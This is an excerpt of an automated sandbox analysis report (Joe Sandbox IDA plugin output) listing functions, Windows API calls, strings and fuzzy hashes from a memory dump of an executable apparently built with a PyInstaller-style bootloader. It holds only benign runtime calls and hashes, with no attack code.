                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: fa40dd5a34ae4d0b6736a9b6b46f8404287a490a05e4db78c585315ae40f634e
                                                        • Instruction ID: 89de9fff27a0e317d41dd9b0f66d6a03213f8d072f92414840395a80cbcbddc8
                                                        • Opcode Fuzzy Hash: fa40dd5a34ae4d0b6736a9b6b46f8404287a490a05e4db78c585315ae40f634e
                                                        • Instruction Fuzzy Hash: 9331C729F5A652A1FE11FB42D843979A3D4BF54BA1F9906B4DE1E4B390DF3CE4409320
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF73AE12ABB), ref: 00007FF73AE18B1A
                                                          • Part of subcall function 00007FF73AE129E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF73AE187F2,?,?,?,?,?,?,?,?,?,?,?,00007FF73AE1101D), ref: 00007FF73AE12A14
                                                          • Part of subcall function 00007FF73AE129E0: MessageBoxW.USER32 ref: 00007FF73AE12AF0
                                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF73AE12ABB), ref: 00007FF73AE18BA0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$ErrorLastMessage
                                                        • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                        • API String ID: 3723044601-876015163
                                                        • Opcode ID: 2a7f0904e5ec1897560545d2159a663e9c273eaf1fea03a0d1ae7df506dc6c73
                                                        • Instruction ID: d5e492c7cc8c2a5e9f402b36f0bca793533e77e81b957bb7f82b431de0f01b80
                                                        • Opcode Fuzzy Hash: 2a7f0904e5ec1897560545d2159a663e9c273eaf1fea03a0d1ae7df506dc6c73
                                                        • Instruction Fuzzy Hash: F621802AB08A5291FB10FB19F843069E3A1AB84BC4BC846B1DB4C43BA9EF2DD5519710
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 5e25a57dc3899cb5d9e1114fbc8c557aa55031a2469902f6cab5e8a78f8e35b9
                                                        • Instruction ID: a822b9a2e119fcd36897484cd43e3e1153afff384debadf8368ed18e4bc7fc90
                                                        • Opcode Fuzzy Hash: 5e25a57dc3899cb5d9e1114fbc8c557aa55031a2469902f6cab5e8a78f8e35b9
                                                        • Instruction Fuzzy Hash: C5217C2CAC824B62FA6477315A57179E2525F847B0F9047B8E83E47BC6DE2CA8016720
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: 47774de373198f8681994077b4026dd9a590ed4534763da2009e0dd4878e84a9
                                                        • Instruction ID: aa1518909b8360b0cbc081cbb7c8472cbbdb8c12f7f3454955d37ced7cd9f33a
                                                        • Opcode Fuzzy Hash: 47774de373198f8681994077b4026dd9a590ed4534763da2009e0dd4878e84a9
                                                        • Instruction Fuzzy Hash: 2E11D325B58A5196F750BB12E857329B3A4FB88FE0F804274DA1E877E4CF7DD4048750
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,?,00007FF73AE254CD,?,?,?,?,00007FF73AE2F1BF,?,?,00000000,00007FF73AE2B9A6,?,?,?), ref: 00007FF73AE2B897
                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF73AE254CD,?,?,?,?,00007FF73AE2F1BF,?,?,00000000,00007FF73AE2B9A6,?,?,?), ref: 00007FF73AE2B8CD
                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF73AE254CD,?,?,?,?,00007FF73AE2F1BF,?,?,00000000,00007FF73AE2B9A6,?,?,?), ref: 00007FF73AE2B8FA
                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF73AE254CD,?,?,?,?,00007FF73AE2F1BF,?,?,00000000,00007FF73AE2B9A6,?,?,?), ref: 00007FF73AE2B90B
                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF73AE254CD,?,?,?,?,00007FF73AE2F1BF,?,?,00000000,00007FF73AE2B9A6,?,?,?), ref: 00007FF73AE2B91C
                                                        • SetLastError.KERNEL32(?,?,?,00007FF73AE254CD,?,?,?,?,00007FF73AE2F1BF,?,?,00000000,00007FF73AE2B9A6,?,?,?), ref: 00007FF73AE2B937
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 941158fb4e6d3a9375e13d6d10033e8ffcdbbced4d4dd5e625aa307a16b34608
                                                        • Instruction ID: 91b7a0ca15c3e918ba06c9c33e7e587c4565c1e2c6ad067422c5d35b77f7306e
                                                        • Opcode Fuzzy Hash: 941158fb4e6d3a9375e13d6d10033e8ffcdbbced4d4dd5e625aa307a16b34608
                                                        • Instruction Fuzzy Hash: 21118E28ECC64A62FA1877315A47179E2519F847B0FC447B8E83E467C7DE6CB8016720
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: c8f7f253a213423ff5db8842e39d1181b4fa0cc0edf0f0e27fe70a45a9ca17df
                                                        • Instruction ID: 37c3d4357f78bf30c75d3d2d1acaf2130333b67a23673a6545cd9eecfcd0f510
                                                        • Opcode Fuzzy Hash: c8f7f253a213423ff5db8842e39d1181b4fa0cc0edf0f0e27fe70a45a9ca17df
                                                        • Instruction Fuzzy Hash: DF511A3AB55262A6F714FF51E486A28B795FB80B94F9082F0DD4E07748EF78E840D710
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                        • String ID: Unhandled exception in script
                                                        • API String ID: 3081866767-2699770090
                                                        • Opcode ID: aedd94d896d3770322b3bc916a57fa4c811986127e2200c50fe109d0e77cca38
                                                        • Instruction ID: e7a8c34cb7ed4d9ac6318b83baf1681eccc7761473b637f94a53473859fdfdf7
                                                        • Opcode Fuzzy Hash: aedd94d896d3770322b3bc916a57fa4c811986127e2200c50fe109d0e77cca38
                                                        • Instruction Fuzzy Hash: B531803AA4868298FB24FB61E8571F9A360FF89784F800175EA4D47B55DF3CD105D710
                                                        APIs
                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF73AE187F2,?,?,?,?,?,?,?,?,?,?,?,00007FF73AE1101D), ref: 00007FF73AE12A14
                                                          • Part of subcall function 00007FF73AE18560: GetLastError.KERNEL32(00000000,00007FF73AE12A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF73AE1101D), ref: 00007FF73AE18587
                                                          • Part of subcall function 00007FF73AE18560: FormatMessageW.KERNEL32 ref: 00007FF73AE185B6
                                                          • Part of subcall function 00007FF73AE18AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF73AE12ABB), ref: 00007FF73AE18B1A
                                                        • MessageBoxW.USER32 ref: 00007FF73AE12AF0
                                                        • MessageBoxA.USER32 ref: 00007FF73AE12B0C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                        • String ID: %s%s: %s$Fatal error detected
                                                        • API String ID: 2806210788-2410924014
                                                        • Opcode ID: c01ac0bbfceecfac493be67ae1d6a2211250b6a817a0c50f994bc812b65e1c92
                                                        • Instruction ID: 786cc51dfba40600aa19bee2903a36375466a2020db95c5e414f214ef8c45bef
                                                        • Opcode Fuzzy Hash: c01ac0bbfceecfac493be67ae1d6a2211250b6a817a0c50f994bc812b65e1c92
                                                        • Instruction Fuzzy Hash: 93317076A68692A1F630FB10E4536EAA364FF84B84F804176E68D03A99DF3CD605DB50
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: bbe3d75c1d18d9b252fc65a249d413b32bc9fbcf71b4c61f8ce4d80949566840
                                                        • Instruction ID: b96776d499cbf5c44137ee5191a2921d47a858837ad79e9225430cb3ef570cfe
                                                        • Opcode Fuzzy Hash: bbe3d75c1d18d9b252fc65a249d413b32bc9fbcf71b4c61f8ce4d80949566840
                                                        • Instruction Fuzzy Hash: 56F0C229E48706A1FB14BB24E8577799360EF48B60FC40279C66E461E4CF3DD488E320
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                        • Instruction ID: aa0f80966d718ea0341dd0535069942788dd7a6e97d67b8599895dcbbe18fb3f
                                                        • Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                        • Instruction Fuzzy Hash: A011913AE9CA0321F6543128E467379D4806F94F70E8806B4E96E073DACF2FA8816220
                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,00007FF73AE2AB67,?,?,00000000,00007FF73AE2AE02,?,?,?,?,?,00007FF73AE230CC), ref: 00007FF73AE2B96F
                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF73AE2AB67,?,?,00000000,00007FF73AE2AE02,?,?,?,?,?,00007FF73AE230CC), ref: 00007FF73AE2B98E
                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF73AE2AB67,?,?,00000000,00007FF73AE2AE02,?,?,?,?,?,00007FF73AE230CC), ref: 00007FF73AE2B9B6
                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF73AE2AB67,?,?,00000000,00007FF73AE2AE02,?,?,?,?,?,00007FF73AE230CC), ref: 00007FF73AE2B9C7
                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF73AE2AB67,?,?,00000000,00007FF73AE2AE02,?,?,?,?,?,00007FF73AE230CC), ref: 00007FF73AE2B9D8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID:
                                                        • API String ID: 3702945584-0
                                                        • Opcode ID: 4fc6ccaa14371e387e5c22fb95057e46c3ade10dd54edcd3ce0e48e5b46d1de5
                                                        • Instruction ID: b0187621bd9460ff08a50361c0c798b86e11a7c6b7e70e25594e2ff569f1023a
                                                        • Opcode Fuzzy Hash: 4fc6ccaa14371e387e5c22fb95057e46c3ade10dd54edcd3ce0e48e5b46d1de5
                                                        • Instruction Fuzzy Hash: 94117228FC824A61FA54B7769A53179E2415F443B0FC443B8E87D467C6DE2CE841A720
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID:
                                                        • API String ID: 3702945584-0
                                                        • Opcode ID: 64fe73475c7f3c5e3ff0e30dd8e21900901c314ca9004384e47b330d372873f3
                                                        • Instruction ID: 509f0af61dc0abd18ddb2578761db6630520426916c230be9ef68c24bcfbc38c
                                                        • Opcode Fuzzy Hash: 64fe73475c7f3c5e3ff0e30dd8e21900901c314ca9004384e47b330d372873f3
                                                        • Instruction Fuzzy Hash: D311E528EC920F62F96C767159531BAA2815F85370FD847BCD93E4A2D3DD2CB811B631
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: verbose
                                                        • API String ID: 3215553584-579935070
                                                        • Opcode ID: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
                                                        • Instruction ID: cf2cd0de91436b60c3f26db50e8dd007032d8561ee2a40b93c91f429681277f9
                                                        • Opcode Fuzzy Hash: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
                                                        • Instruction Fuzzy Hash: 6F91D02AA8864AA1F721BF24D45337DB3A1EB40B54FC4427ADA5E473D5DE3CE841A320
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                        • API String ID: 3215553584-1196891531
                                                        • Opcode ID: 1a54e2a2b62d6839c513ace75884cea9e48035532f3c44be9a18c4b4dcf643eb
                                                        • Instruction ID: 0a88048bb19200a8d745372648249c36119d0adb88c6ad217983deedac9500d8
                                                        • Opcode Fuzzy Hash: 1a54e2a2b62d6839c513ace75884cea9e48035532f3c44be9a18c4b4dcf643eb
                                                        • Instruction Fuzzy Hash: 7481E97EE8C202A5F7657F258113278B690AF10F86FD540B4CA8E576D5CB2FE801BB61
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3544855599-2084237596
                                                        • Opcode ID: 37ce56c1d967fba8f41503b71a699ba51a6fbc199d8f022e66d4a2d7a57293db
                                                        • Instruction ID: d39db971013af081422537f7f258d923801b88a5601c65e4729689c3866e232c
                                                        • Opcode Fuzzy Hash: 37ce56c1d967fba8f41503b71a699ba51a6fbc199d8f022e66d4a2d7a57293db
                                                        • Instruction Fuzzy Hash: 23619C37A08B559AF710AF65D4823ADB7A0FB48B88F4442A6EF4D13B96DF38E444C750
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: 80d5d2ed719ea387a00afc8e5c38e85421d4b0de11d669121429011e6c75d481
                                                        • Instruction ID: e8d9fad9bcc1945ac75d32b9f96e1130ab4bd79b7a950e59f1c499bf46d1f982
                                                        • Opcode Fuzzy Hash: 80d5d2ed719ea387a00afc8e5c38e85421d4b0de11d669121429011e6c75d481
                                                        • Instruction Fuzzy Hash: 0451D17A94825296FA64BF11D147368B7A0FB44B88F8481F2DA9D43B86CF3CE850E750
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: Message$ByteCharMultiWide
                                                        • String ID: %s%s: %s$Fatal error detected
                                                        • API String ID: 1878133881-2410924014
                                                        • Opcode ID: e8e3c511841a02337865787422672dc7088828a74b651abb3bad42d47e8d3758
                                                        • Instruction ID: 40ab15a3d79da1ac363ef2259f92d73906dc5c56ce12deb60caa69a578458ee2
                                                        • Opcode Fuzzy Hash: e8e3c511841a02337865787422672dc7088828a74b651abb3bad42d47e8d3758
                                                        • Instruction Fuzzy Hash: 69317076A68692A1F630FB10E4536EAA364FF84B84FC04176E68D07A99DF3CD205DB50
                                                        APIs
